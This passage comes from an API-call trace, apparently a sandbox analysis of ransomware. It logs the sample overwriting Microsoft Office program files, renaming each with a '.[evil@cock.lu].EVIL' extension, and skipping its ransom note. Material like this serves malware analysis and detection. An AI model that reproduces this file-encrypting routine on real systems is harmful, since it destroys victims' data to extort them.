office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.185] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4cc0, lpOverlapped=0x0) returned 1 [0104.203] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.203] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.203] _errno () returned 0x84b1160840 [0104.203] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.203] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x4ce0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ce0, lpOverlapped=0x0) returned 1 [0104.204] CloseHandle (hObject=0x1a4) returned 1 [0104.204] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.204] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.204] __uncaught_exception () returned 0x84b1160800 [0104.204] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.204] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0104.205] ??_V@YAXPEAX@Z () returned 0x1 [0104.207] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0104.208] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.208] wcsstr (_Str="api-ms-win-crt-runtime-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.208] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll") returned 80 [0104.208] wcscmp (_String1="api-ms-win-crt-runtime-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.208] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-runtime-l1-1-0.dll") returned 0x0 [0104.208] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll") returned 0x50 [0104.208] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.210] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x5ac0, lpOverlapped=0x0) returned 1 [0104.231] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.231] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.231] _errno () returned 0x84b1160840 [0104.231] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.231] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x5ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x5ae0, lpOverlapped=0x0) returned 1 [0104.231] CloseHandle (hObject=0x1a4) returned 1 [0104.231] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.232] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.232] __uncaught_exception () returned 0x84b1160800 [0104.232] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.232] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0104.232] ??_V@YAXPEAX@Z () returned 0x1 [0104.235] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-runtime-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0104.235] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.235] wcsstr (_Str="api-ms-win-crt-stdio-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.235] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 78 [0104.235] wcscmp (_String1="api-ms-win-crt-stdio-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.235] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-stdio-l1-1-0.dll") returned 0x0 [0104.235] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll") returned 0x4e [0104.235] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.237] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x60c0, lpOverlapped=0x0) returned 1 [0104.241] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.241] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.241] _errno () returned 0x84b1160840 [0104.241] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.241] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x60e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x60e0, lpOverlapped=0x0) returned 1 [0104.241] CloseHandle (hObject=0x1a4) returned 1 [0104.241] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.241] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.241] __uncaught_exception () returned 0x84b1160800 [0104.242] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.242] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0104.242] ??_V@YAXPEAX@Z () returned 0x1 [0104.245] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-stdio-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0104.245] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.245] wcsstr (_Str="api-ms-win-crt-string-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.245] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 79 [0104.245] wcscmp (_String1="api-ms-win-crt-string-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.245] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-string-l1-1-0.dll") returned 0x0 [0104.245] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll") returned 0x4f [0104.245] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.247] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x60c0, lpOverlapped=0x0) returned 1 [0104.262] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.262] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.262] _errno () returned 0x84b1160840 [0104.262] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.262] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x60e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x60e0, lpOverlapped=0x0) returned 1 [0104.262] CloseHandle (hObject=0x1a4) returned 1 [0104.262] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.262] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.263] __uncaught_exception () returned 0x84b1160800 [0104.263] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.263] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0104.263] ??_V@YAXPEAX@Z () returned 0x1 [0104.266] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-string-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0104.267] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.267] wcsstr (_Str="api-ms-win-crt-time-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.267] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 77 [0104.267] wcscmp (_String1="api-ms-win-crt-time-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.267] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-time-l1-1-0.dll") returned 0x0 [0104.267] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll") returned 0x4d [0104.267] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.269] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x52c0, lpOverlapped=0x0) returned 1 [0104.290] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.290] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.290] _errno () returned 0x84b1160840 [0104.290] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.290] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x52e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x52e0, lpOverlapped=0x0) returned 1 [0104.290] CloseHandle (hObject=0x1a4) returned 1 [0104.290] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.291] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.291] __uncaught_exception () returned 0x84b1160800 [0104.291] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.291] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0104.292] ??_V@YAXPEAX@Z () returned 0x1 [0104.295] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-time-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0104.295] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.295] wcsstr (_Str="api-ms-win-crt-utility-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.295] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 80 [0104.295] wcscmp (_String1="api-ms-win-crt-utility-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.295] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-utility-l1-1-0.dll") returned 0x0 [0104.295] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 0x50 [0104.295] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.297] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4ac0, lpOverlapped=0x0) returned 1 [0104.313] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.313] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.313] _errno () returned 0x84b1160840 [0104.313] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.313] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ae0, lpOverlapped=0x0) returned 1 [0104.313] CloseHandle (hObject=0x1a4) returned 1 [0104.313] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.313] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.313] __uncaught_exception () returned 0x84b1160800 [0104.313] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.313] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0104.314] ??_V@YAXPEAX@Z () returned 0x1 [0104.317] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0104.317] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.317] wcsstr (_Str="AppVDllSurrogate32.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.317] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 69 [0104.317] wcscmp (_String1="AppVDllSurrogate32.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.317] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVDllSurrogate32.exe") returned 0x0 [0104.317] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 0x45 [0104.317] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.319] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x2ff30, lpOverlapped=0x0) returned 1 [0104.350] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.350] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.350] _errno () returned 0x84b1160840 [0104.350] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.350] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x2ff40, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x2ff40, lpOverlapped=0x0) returned 1 [0104.376] CloseHandle (hObject=0x1a4) returned 1 [0104.376] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.376] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.376] __uncaught_exception () returned 0x84b1160800 [0104.376] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.386] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate32.exe"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate32.exe.[evil@cock.lu].evil")) returned 1 [0104.387] ??_V@YAXPEAX@Z () returned 0x1 [0104.390] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe", dwFileAttributes=0x200) returned 0 [0104.390] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.390] wcsstr (_Str="AppVDllSurrogate64.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.390] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe") returned 69 [0104.390] wcscmp (_String1="AppVDllSurrogate64.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.390] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVDllSurrogate64.exe") returned 0x0 [0104.390] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe") returned 0x45 [0104.390] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.392] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x37930, lpOverlapped=0x0) returned 1 [0104.425] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.425] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.425] _errno () returned 0x84b1160840 [0104.425] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.425] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x37940, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x37940, lpOverlapped=0x0) returned 1 [0104.426] CloseHandle (hObject=0x1a4) returned 1 [0104.426] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.426] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.426] __uncaught_exception () returned 0x84b1160800 [0104.426] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.426] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate64.exe"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate64.exe.[evil@cock.lu].evil")) returned 1 [0104.427] ??_V@YAXPEAX@Z () returned 0x1 [0104.430] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe", dwFileAttributes=0x200) returned 0 [0104.430] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.430] wcsstr (_Str="AppvIsvStream32.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.430] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 66 [0104.430] wcscmp (_String1="AppvIsvStream32.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.430] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppvIsvStream32.dll") returned 0x0 [0104.430] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 0x42 [0104.430] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 